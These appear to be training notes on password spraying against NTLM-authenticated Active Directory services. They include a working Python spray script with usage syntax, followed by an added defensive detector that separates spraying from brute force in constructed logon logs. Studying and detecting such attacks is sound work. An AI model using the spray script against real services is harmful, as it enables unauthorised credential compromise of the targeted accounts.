NTLM Authenticated Services

  • New Technology LAN Manager

  • a suite of security protocols used to authenticate users' identities in Active Directory (AD); services such as IIS web applications can be configured to accept NTLM (Windows) authentication

Brute Force

  • Brute force attacks can be used against NTLM-authenticated services

  • since most environments have account lockout policies, it is best to use password spraying

    • this uses one password against every account, so no single account accumulates enough failures to lock out

    • can be noisy and alert a SOC: many failed logons for many different accounts from one source in a short time

  • Python password spraying script

    • usage: python ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>

import requests
from requests_ntlm import HttpNtlmAuth


class NtlmPasswordSpray:
    # Class wrapper, constructor and status-code constants are assumed here so the
    # method below runs; the original page shows only the password_spray method.
    HTTP_AUTH_SUCCEED_CODE = 200   # assumed: server answers 200 once NTLM auth succeeds
    HTTP_AUTH_FAILED_CODE = 401    # assumed: server answers 401 when auth fails

    def __init__(self, users, fqdn, verbose=False):
        self.users = users      # usernames read from <userfile>
        self.fqdn = fqdn        # domain, used as DOMAIN\user
        self.verbose = verbose

    def password_spray(self, password, url):
        print("[*] Starting password spray attack using the following password: " + password)
        # Reset valid credential counter
        count = 0
        # Iterate through all of the possible usernames
        for user in self.users:
            # Make a request to the website and attempt Windows (NTLM) authentication
            response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))
            # Read status code of response to determine if authentication was successful
            if response.status_code == self.HTTP_AUTH_SUCCEED_CODE:
                print("[+] Valid credential pair found! Username: " + user + " Password: " + password)
                count += 1
                continue
            if self.verbose and response.status_code == self.HTTP_AUTH_FAILED_CODE:
                print("[-] Failed login with Username: " + user)
        print("[*] Password spray attack completed, " + str(count) + " valid credential pairs found")
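The note above says a spray "can be noisy and alert a SOC". The following added example (not part of the original notes) shows the defender's side of that statement: it parses a few constructed failed-logon records, modelled loosely on the fields of Windows Security event 4625 (TargetUserName, IpAddress, LogonType), and separates the spray pattern (one source, many distinct accounts, one or two failures each) from a classic per-account brute force (one source, one account, many failures). The log format, thresholds, IP addresses and usernames are all assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified failed/successful-logon records (loosely modelled on
# Windows Security event 4625/4624 fields). Not real log data.
SAMPLE_LOG = """\
2024-03-01T09:00:01 EventID=4625 TargetUserName=alice IpAddress=10.0.0.5 LogonType=3
2024-03-01T09:00:02 EventID=4625 TargetUserName=bob IpAddress=10.0.0.5 LogonType=3
2024-03-01T09:00:03 EventID=4625 TargetUserName=carol IpAddress=10.0.0.5 LogonType=3
2024-03-01T09:00:04 EventID=4625 TargetUserName=dave IpAddress=10.0.0.5 LogonType=3
2024-03-01T09:00:05 EventID=4625 TargetUserName=erin IpAddress=10.0.0.5 LogonType=3
2024-03-01T09:00:06 EventID=4624 TargetUserName=frank IpAddress=10.0.0.5 LogonType=3
2024-03-01T09:05:00 EventID=4625 TargetUserName=alice IpAddress=10.0.0.9 LogonType=3
2024-03-01T09:05:10 EventID=4625 TargetUserName=alice IpAddress=10.0.0.9 LogonType=3
2024-03-01T09:05:20 EventID=4625 TargetUserName=alice IpAddress=10.0.0.9 LogonType=3
2024-03-01T09:05:30 EventID=4625 TargetUserName=alice IpAddress=10.0.0.9 LogonType=3
2024-03-01T09:05:40 EventID=4625 TargetUserName=alice IpAddress=10.0.0.9 LogonType=3
2024-03-01T11:00:00 EventID=4625 TargetUserName=bob IpAddress=10.0.0.7 LogonType=3
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) LogonType=(?P<ltype>\d+)$"
)


def parse_events(text):
    """Parse the constructed log format into dicts, skipping lines that do not match."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m.group("ts")),
            "eid": int(m.group("eid")),
            "user": m.group("user"),
            "ip": m.group("ip"),
        })
    return sorted(events, key=lambda e: e["ts"])


def _by_ip(events, eid):
    """Group (timestamp, user) pairs of one event id by source IP."""
    grouped = defaultdict(list)
    for e in events:
        if e["eid"] == eid:
            grouped[e["ip"]].append((e["ts"], e["user"]))
    return grouped


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Flag a source that fails logons for many distinct accounts inside one window
    while touching each account only a few times (the spray shape). Any successful
    logon from the same source in that window is reported as a likely hit."""
    failures, successes = _by_ip(events, 4625), _by_ip(events, 4624)
    alerts = []
    for ip, attempts in failures.items():
        for i, (start, _) in enumerate(attempts):       # slide the window over failures
            per_user = defaultdict(int)
            for ts, user in attempts[i:]:
                if ts - start > window:
                    break
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits = sorted({u for ts, u in successes.get(ip, [])
                               if start <= ts <= start + window})
                alerts.append({"ip": ip, "start": start,
                               "users": sorted(per_user), "hits": hits})
                break                                   # one alert per source is enough
    return alerts


def detect_brute_force(events, window=timedelta(minutes=10), min_failures=5):
    """Flag (ip, user) pairs with many failures against a single account in one window."""
    alerts = []
    for ip, attempts in _by_ip(events, 4625).items():
        for user in sorted({u for _, u in attempts}):
            stamps = [ts for ts, u in attempts if u == user]
            for i, start in enumerate(stamps):
                if sum(1 for ts in stamps[i:] if ts - start <= window) >= min_failures:
                    alerts.append((ip, user))
                    break
    return alerts


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for a in detect_password_spray(evs):
        print("[spray] %s from %s: %d accounts, hits=%s" % (a["start"], a["ip"], len(a["users"]), a["hits"]))
    for ip, user in detect_brute_force(evs):
        print("[brute] %s against %s" % (ip, user))
```

The two detections are deliberately separate: a lockout policy (the reason the notes recommend spraying) blunts the per-account brute force but not the spray, so a SOC that only counts failures per account misses exactly the pattern this page describes. Counting distinct accounts per source, and correlating any success from that source inside the same window, is what makes the spray visible.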
